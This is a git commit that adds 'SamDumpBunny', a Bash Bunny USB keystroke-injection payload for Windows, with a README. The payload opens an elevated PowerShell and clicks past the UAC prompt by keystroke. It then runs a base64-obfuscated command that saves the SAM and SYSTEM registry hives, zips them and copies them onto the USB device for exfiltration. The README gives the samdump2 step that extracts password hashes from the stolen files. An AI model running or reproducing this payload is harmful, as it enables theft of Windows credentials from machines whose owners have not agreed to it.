Uploaded SamDumpBunny

Dumps users sam & system hive, which can be used later to extract the users hashes
2025-10-29 16:58:25 +00:00 · 2022-06-08 11:13:14 +02:00 · 2022-06-08 11:13:14 +02:00 · 614d313690
commit 614d313690
parent 89dbe3f9ba
2 changed files with 74 additions and 0 deletions
--- a/payloads/library/credentials/SamDumpBunny/README.md
+++ b/payloads/library/credentials/SamDumpBunny/README.md
@ -0,0 +1,21 @@
+**Title: SamDumpBunny**
+
+<p>Author: 0iphor13<br>
+OS: Windows<br>
+Version: 1.0<br>
+
+**What is SamDumpBunny?**
+#
+<p>SamDumpBunny dumps the users sam and system hive and compresses them into a zip file.<br>
+Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
+
+
+**Instruction:**
+1. Plug in your Bashbunny and wait a few seconds
+
+2. Unzip the exfiltrated zip file onto your machine.
+
+3. Use a tool like samdump2 on your machine to extract the users hashes.
+	> `samdump2 BunnySys BunnySam`
+
+![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
--- a/payloads/library/credentials/SamDumpBunny/payload.txt
+++ b/payloads/library/credentials/SamDumpBunny/payload.txt
@ -0,0 +1,53 @@
+#!/bin/bash
+#
+# Title:         SamDumpBunny
+# Description:   Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
+# Author:        0iphor13
+# Version:       1.0
+# Category:      Credentials
+# Attackmodes:   HID, Storage
+
+LED SETUP
+
+Q DELAY 500
+
+GET SWITCH_POSITION
+DUCKY_LANG de
+
+Q DELAY 500
+
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
+
+Q DELAY 1000
+RUN WIN "powershell Start-Process powershell -Verb runAs"
+Q ENTER
+Q DELAY 1000
+
+#Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...)
+Q ALT j
+Q DELAY 250
+
+Q DELAY 250
+Q STRING "powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAQgB1AG4AbgB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlAC"
+Q DELAY 250
+Q STRING "AAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgA"
+Q DELAY 250
+Q STRING "CIAJABQAFcARABcAEIAdQBuAG4AeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABCAHUAbgBuAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBu"
+Q DELAY 250
+Q STRING "AFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEIAdQBuAG4AeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAcgBl"
+Q DELAY 250
+Q STRING "AG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAYQBtADsAZQB4AGkAdAA="
+Q DELAY 250
+Q STRING ";mv SamDumpBunny.zip ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
+Q DELAY 250
+Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';Start-Sleep 3;(New-Object -comObject Shel"
+Q DELAY 250
+Q STRING "l.Application).Namespace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
+Q DELAY 300
+Q ENTER
+
+LED FINISH